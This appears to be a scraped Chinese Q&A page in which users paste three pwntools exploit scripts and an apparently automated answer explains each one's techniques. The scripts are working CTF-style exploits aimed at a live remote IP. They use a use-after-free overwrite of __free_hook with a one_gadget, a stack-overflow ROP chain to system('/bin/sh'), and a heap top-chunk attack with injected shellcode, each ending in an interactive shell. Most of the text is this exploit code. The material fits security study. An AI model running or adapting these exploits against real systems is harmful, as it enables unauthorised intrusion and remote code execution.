from pwn import * context(log_level='debug',os='linux',arch='i386') # p = process("./1") p = remote("59.110.164.72",10085) elf=ELF('./1') libc=ELF('libc-2.27.so') # gdb.attach(p,"b *0x400e2b") # pause() payload1 ="+"+str(0x7E4750AB) p.sendlineafter(b"welcome~ please input the password:\n",payload1) def menu(choice): p.sendlineafter(b"please choose one!\n",str(choice)) def add(size): menu(1) p.sendlineafter(b"Age of Stu:\n",str(size)) def edit(idx,com): menu(3) p.sendlineafter(b"Index:\n",str(idx)) p.sendlineafter(b"Content of Stu:\n",com) def free(idx): menu(2) p.sendlineafter(b"Index:\n",str(idx)) def show(idx): menu(4) p.sendlineafter(b"Index:\n",str(idx)) for i in range(9): add(0x100) for i in range(9,-1,-1): free(i) for i in range(7): add(0x100) add(0x100) show(7) p.recvuntil("Content : ") libc_base = u64(p.recv(6).ljust(8,b"\x00"))-0x3ebeb0 print ("libc_base -->",hex(libc_base)) free_hook = libc_base+libc.sym['__free_hook'] one = [0x4f2a5,0x4f302,0x10a2fc] gadgeb = one[1]+libc_base free(0) free(1) free(2) edit(2,p64(free_hook)) add(0x100) add(0x100) edit(6,p64(gadgeb)) edit(7,"/bin/sh\x00") # gdb.attach(p,"b *0x400c8f") # pause() free(7) p.interactive()这串代码的知识点
时间: 2024-02-26 12:52:30 浏览: 169
这段代码主要是一个堆利用的漏洞利用,包括了堆溢出和 UAF。具体来说,它通过向程序发送特定的输入,构造了一段堆的布局,然后通过 UAF 改变一个指针的指向,改为了 `__free_hook` 的地址,并将一个 one gadget 的地址写入到 `__free_hook` 中,最后通过释放一个指向 "/bin/sh" 字符串的指针,触发 one gadget,从而成功获取 shell。其中,涉及到了一些基础的 pwntools 的使用,如 `pwn.remote()`、`pwn.ELF()` 等。同时,还需要了解堆的基本知识,如堆的布局、堆块的结构等。
相关问题
from pwn import * import struct import os context(os='linux', arch='amd64', log_level='debug') elf = ELF("./Login") libc = ELF("./libc-2.23.so") DEBUG = 0 def exp(p): p.recvuntil("Here is a tip: 0x") std_addr = int(p.recv(12), 16) info("std_addr----->"+hex(std_addr)) libc.address = std_addr - 0x3c48e0 p.recvuntil("input the username:\n") p.send(b"a"*28+b"\xCC\x15\xCC\x15") p.recvuntil("input the password:\n") payload = b"a"*0x28 + p64(0x00000000004008c3) + p64(libc.search(b"/bin/sh").__next__()) + p64(libc.sym["system"]) p.send(payload) p.interactive() def main(): if DEBUG: p = process("./Login") gdb.attach(p, "source ./.gdbinit") exp(p) else: p = remote("59.110.164.72", 10000) exp(p) if __name__ == "__main__": main()这串代码的知识点
这是一段使用 pwntools 库编写的 exploit 脚本,用于攻击一个名为 Login 的程序。该脚本的主要作用是通过溢出 Login 程序的缓冲区来实现攻击,并最终获取一个 shell。
具体来说,该脚本的主要知识点包括:
1. 使用 pwntools 库中的各种函数来与目标程序进行交互,如 `recvuntil`、`send`、`interactive` 等。
2. 使用 `ELF` 类来解析目标程序的 ELF 文件,获取其中的地址信息等。
3. 使用 `libc` ELF 文件中的符号来获取函数地址,如 `search`、`sym` 等。
4. 使用 `gdb` 调试工具来调试目标程序,如 `process`、`attach` 等。
5. 利用栈溢出漏洞来覆盖程序的返回地址,从而实现控制程序流程的目的。
6. 利用泄漏的地址信息计算出 libc 的基地址,从而获取 libc 中的函数地址。
7. 利用 `system` 函数来执行 shell 命令,从而获取 shell。
from pwn import * context(log_level='debug',os='linux',arch='amd64') # p=process('./1') p =remote("59.110.164.72",10025) elf=ELF('./1') shellcode = asm(shellcraft.sh()) # gdb.attach(p,"b *0x400a28") # pause() payload1 =b"\x00"*24 p.sendafter(b"Start injecting\n",payload1) p.recvuntil(b"materials\n") heap_addr = int(p.recv(8),10) print (heap_addr) # heap_addr =int((heap_addr),16) print (hex(heap_addr)) sleep(0.1) p.sendline(str(-1)) #change top_chunk sleep(0.1) p.sendline(str(6296200-heap_addr)) #get_size p.sendafter(b"Answer time is close to over\n","a"*0x10) # gdb.attach(p,"b *0x400b49") # pause() payload2= b"a"*0x60+p64(0x6012a0+0x80+0x120)+p64(0x4008e3)+b"a"*0x10+\ p64(0x6012a0+0x60)+p64(0x400914)+shellcode p.sendafter(b"irect to destination\n",payload2) p.recvuntil(b"you pass") # sleep() p.recv(0x1b0) sleep(0.5) stack = u64(p.recvuntil(b"\x7f").ljust(8,b"\x00"))-0xd0 print(hex(stack)) # gdb.attach(p,"b *0x4008e3") # pause() payload3 = b"a"*0x68+p64(stack) p.sendline(payload3) p.interactive()这串代码的知识点和用处
这段代码是针对一个名为“materials”的程序进行的攻击,该程序存在堆溢出漏洞和栈溢出漏洞。攻击的目的是获取程序的最高权限,实现远程代码执行。
代码中使用了pwntools库,主要实现了以下功能:
1. 构造堆溢出payload,通过修改堆块头部实现伪造chunk。具体地,构造了两个chunk,第一个chunk大小设为负数,通过修改top_chunk的方式使其指向第二个chunk的头部。第二个chunk的大小设为目标位置(0x6012a0+0x80+0x120)与堆基址的差值,即让其覆盖到目标位置上。然后在第二个chunk的尾部构造ROP链实现远程代码执行。
2. 获取栈地址,利用栈溢出漏洞,将ROP链的返回地址修改为栈上的地址,从而在返回时跳转到栈上执行代码。
总的来说,这段代码主要是利用了堆溢出和栈溢出漏洞,通过构造payload实现远程代码执行的攻击。
阅读全文